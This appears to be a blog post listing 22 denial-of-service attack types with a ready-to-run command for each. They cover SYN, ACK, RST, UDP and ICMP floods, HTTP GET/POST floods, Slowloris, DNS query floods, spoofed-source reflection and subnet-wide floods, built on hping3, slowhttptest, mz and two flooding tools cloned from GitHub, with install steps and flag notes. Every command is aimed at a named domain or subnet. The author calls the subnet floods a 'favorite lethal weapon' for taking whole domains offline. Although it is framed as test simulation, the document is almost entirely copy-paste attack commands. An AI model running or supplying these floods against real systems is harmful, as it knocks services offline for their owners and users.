Various DDoS Attacks & Applications

NoDDoS Attack TypeDDoS Attack Details
01-)TCP SYN FloodTCP SYN Port 443
02-)TCP SYN FloodTCP SYN Random Port
03-)TCP ACK FloodTCP ACK Port 443
04-)TCP SYN ACK FloodTCP SYN ACK Port 443
05-)TCP SYN ACK FloodTCP SYN ACK Random Port
06-)TCP RST FloodTCP RST Port 443
07-)UDP FloodUDP Port 53
08-)UDP FloodUDP Random Port
09-)HTTP Get Flood
10-)HTTP Random Get Flood
11-)HTTP Post Flood
12-)SlowLoris
13-)SlowBody
14-)DNS Query FloodQuery offensivesecurity.org
15-)DNS Subdomain Query FloodQuery ***.offensivesecurity.org
16-)ICMP Flood
17-)NTP ReflectionUDP Flood source port 123
18-)SNMP ReflectionUDP Flood source port 161
19-)SSDP ReflectionUDP Flood source port 1900
20-)DNS ReflectionUDP Flood source port 53
21-)TCP SYN Flood Attack to IP SubnetTCP SYN Random Port
22-)UDP Flood Attack to IP SubnetUDP Random Port

Sample The Targets (Scenerio);

Target URL : https://offensivesecurity.org

Target IP : 192.168.1.10

Target Subnet : 192.168.1/24

Requirements

In order to simulate the appropriate types of DDoS attacks, the packages and tools listed in the requirements list below must be installed on the systems that will perform the DDoS attack.

sudo apt-get install python -y 
sudo apt-get install python3 -y 
sudo apt-get install git -y
sudo apt install golang-go -y
sudo apt-get install hping3 -y 
sudo apt-get install slowhttptest -y 
sudo apt-get install mz -y 
git clone https://github.com/grafov/hulk
git clone https://github.com/Leeon123/golang-httpflood.git

hping3 Manual

We have prepared many of our DDoS attacks through the hping3 tool. Related Hping3 DDoS attack commands: the target to be attacked, the port, the source port for the attack type should be changed and edited according to information such as. For this reason, I share a small list below for some hping3 parameters that we use. I suggest you review the hping3 manual for the different types of DDoS attacks and attacks that will be prepared.

-s : Base Source Port
-p : Destination Port
-S : Set SYN Flag
-A : Set ACK Flag
-SA : Set SYN and ACK Flag
-R : Set RST Flag
--UDP : UDP Mode
--ICMP : ICMP Mode
--keep : Keep still Source Port
--rand-dest : Random Destination Address

DDoS attack types and related attack commands

01-) TCP SYN Flood (TCP SYN – Port 443)

hping3 --flood -S -p 443 offensivesecurity.org

02-) TCP SYN Flood (TCP SYN – Random Port)

hping3 --flood -S -p ++443 offensivesecurity.org

03-) TCP ACK Flood (TCP ACK – Port 443)

hping3 --flood -A -p 443 offensivesecurity.org

04-) TCP SYN ACK Flood (TCP SYN ACK – Port 443)

hping3 --flood -SA -p 443 offensivesecurity.org

05-) TCP SYN ACK Flood (TCP SYN ACK – Random Port)

hping3 --flood -SA -p ++80 offensivesecurity.org

06-) TCP RST Flood (TCP RST – Port 443)

hping3 --flood -R -p 443 offensivesecurity.org

07-) UDP Flood (UDP – Port 53)

hping3 --flood --udp -p 53 ns1.offensivesecurity.org

08-) UDP Flood (UDP – Random Port)

hping3 --flood --udp -p ++53 ns1.offensivesecurity.org

09-) HTTP Get Flood

cd golang-httpflood/ && yes | go run httpflood.go "https://offensivesecurity.org/" 1000 get 6000 nil

10-) HTTP Random Get Flood

go run ./hulk/hulk.go -site "https://offensivesecurity.org/"

11-) HTTP Post Flood

cd golang-httpflood/ && yes | go run httpflood.go "https://offensivesecurity.org/" 1000 post 6000 nil

12-) SlowLoris

while true; do slowhttptest -H -c 60000 -i 8640000 -l 8640000 -r 10000 -s 10240 -x 24 -t GET -u "https://offensivesecurity.org/"; sleep 60; done;

13-) SlowBody

while true; do slowhttptest -B -c 60000 -i 8640000 -l 8640000 -r 10000 -s 10240 -x 24 -t POST -u "https://offensivesecurity.org/"; sleep 60; done;

14-) DNS Query Flood (Query – google.com)

mz -B ns1.offensivesecurity.org -t dns "q=google.com" -c 100000000000

15-) DNS Subdomain Query Flood (Query – ***.offensivesecurity.org)

mz -B ns1.offensivesecurity.org -t dns "q=vpn.offensivesecurity.org" -c 100000000000 

16-) ICMP Flood

hping3 --flood --icmp offensivesecurity.org

17-) NTP Reflection/Amplification (UDP Flood Based – Source Port 123)

hping3 -s 123 --keep --flood --udp -p 443 offensivesecurity.org

18-) SNMP Reflection/Amplification (UDP Flood Based – Source Port 161)

hping3 -s 161 --keep --flood --udp -p 443 offensivesecurity.org

19-) SSDP Reflection/Amplification (UDP Flood Based – Source Port 1900)

hping3 -s 1900 --keep --flood --udp -p 53 ns1.offensivesecurity.org

20-) DNS Reflection/Amplification Attack (UDP Flood Based – Source Port 53)

hping3 -s 53 --keep --flood --udp -p 53 ns1.offensivesecurity.org

And the attack commands that allow us to attack different IP addresses and different ports of the target system’S IP subnet, which are our favorite lethal weapon in our tests, are as follows. In the tests we conducted, we experienced different scenarios such as the following attacks and the fact that the main domain and all its subdomains became inaccessible at the same time.

21-) TCP SYN Flood Attack to IP Subnet (TCP SYN Based – Random Port)

hping3 --flood -S 192.168.0.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood -S 192.168.1.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood -S 192.168.2.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood -S 192.168.3.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;

22-) UDP Flood Attack to IP Subnet (UDP Based – Random Port)

hping3 --flood --udp 192.168.0.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood --udp 192.168.1.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood --udp 192.168.2.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood --udp 192.168.3.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;

Bu yazıyı beğendin mi ?0001

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir